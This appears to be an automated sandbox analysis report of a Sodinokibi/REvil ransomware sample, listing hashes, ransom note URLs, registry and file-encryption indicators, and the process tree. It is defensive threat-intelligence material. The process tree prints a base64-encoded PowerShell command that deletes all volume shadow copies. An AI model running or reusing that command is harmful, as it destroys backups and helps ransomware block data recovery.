Analysis
max time kernel: 145s
max time network: 60s
platform: windows10_x64
resource: win10v200722
submitted: 10-08-2020 11:59
Static task: static1
Behavioral task: behavioral1
  Sample: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
  Resource: win7
Behavioral task: behavioral2
  Sample: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
  Resource: win10v200722
General
Target: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
Size: 116KB
MD5: 90e6ea15ed18005b431e135186d57abf
SHA1: d8e126cd0f5f3f214989c3533fd22c7291c44174
SHA256: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d
SHA512: 91690e64b9d39b2b1c0fb7575d75d632f5fbe1dd6c36b935ea2fde1e7bbbfc0e68ba50d73919f4cb2502d7e2b46fe98a3ddcb217b3cb1da77fc290e86031c60d
Malware Config
Extracted
Path: C:\iz0cns-readme.txt
Family: sodinokibi
Ransom note URLs:
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B6E9B7957F638FA
http://decryptor.cc/5B6E9B7957F638FA
Signatures

Modifies service (2 TTPs, 5 IoCs)
Processes: vssvc.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe, powershell.exe
pid | process
508 | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
508 | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
756 | powershell.exe
756 | powershell.exe
756 | powershell.exe
Suspicious use of WriteProcessMemory (2 IoCs)
Processes: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
description | pid | process | target process
PID 508 wrote to memory of 756 | 508 | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe | powershell.exe
PID 508 wrote to memory of 756 | 508 | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe | powershell.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\11s.bmp" | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs)
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe, powershell.exe, vssvc.exe
description | pid | process
Token: SeDebugPrivilege | 508 | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
Token: SeDebugPrivilege | 756 | powershell.exe
Token: SeBackupPrivilege | 2276 | vssvc.exe
Token: SeRestorePrivilege | 2276 | vssvc.exe
Token: SeAuditPrivilege | 2276 | vssvc.exe
Token: SeTakeOwnershipPrivilege | 508 | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
Drops file in Program Files directory (16 IoCs)
Processes: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
description | ioc | process
File opened for modification | \??\c:\program files\SaveSkip.pptx | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\program files\DisableFormat.i64 | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\program files\EnterMount.vsx | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\program files\GetResize.eps | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\program files\RevokeDisconnect.midi | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File created | \??\c:\program files (x86)\iz0cns-readme.txt | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\program files\ConnectRegister.html | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\program files\ProtectExpand.docm | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\program files\ReceiveStep.tif | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\program files\EditRename.kix | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\program files\UnpublishConvertTo.svgz | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\program files\SetShow.xht | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File created | \??\c:\program files\iz0cns-readme.txt | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\program files\RemoveUse.snd | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\program files\RestartClose.xml | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\program files\SelectExport.pptx | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
Modifies extensions of user files (10 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes: bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
description | ioc | process
File renamed | C:\Users\Admin\Pictures\SelectDeny.tif => \??\c:\users\admin\pictures\SelectDeny.tif.iz0cns | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File renamed | C:\Users\Admin\Pictures\UnprotectUnregister.raw => \??\c:\users\admin\pictures\UnprotectUnregister.raw.iz0cns | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File renamed | C:\Users\Admin\Pictures\EditOut.tiff => \??\c:\users\admin\pictures\EditOut.tiff.iz0cns | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File renamed | C:\Users\Admin\Pictures\ConnectRename.tiff => \??\c:\users\admin\pictures\ConnectRename.tiff.iz0cns | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\users\admin\pictures\EditOut.tiff | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\users\admin\pictures\LimitExpand.tiff | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File renamed | C:\Users\Admin\Pictures\ExportEnter.raw => \??\c:\users\admin\pictures\ExportEnter.raw.iz0cns | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File renamed | C:\Users\Admin\Pictures\InitializeInvoke.crw => \??\c:\users\admin\pictures\InitializeInvoke.crw.iz0cns | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File renamed | C:\Users\Admin\Pictures\LimitExpand.tiff => \??\c:\users\admin\pictures\LimitExpand.tiff.iz0cns | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
File opened for modification | \??\c:\users\admin\pictures\ConnectRename.tiff | bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
Processes

C:\Users\Admin\AppData\Local\Temp\bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - Sets desktop wallpaper using registry
  - Suspicious use of AdjustPrivilegeToken
  - Drops file in Program Files directory
  - Modifies extensions of user files
  PID: 508

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 756

C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 836

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
  PID: 2276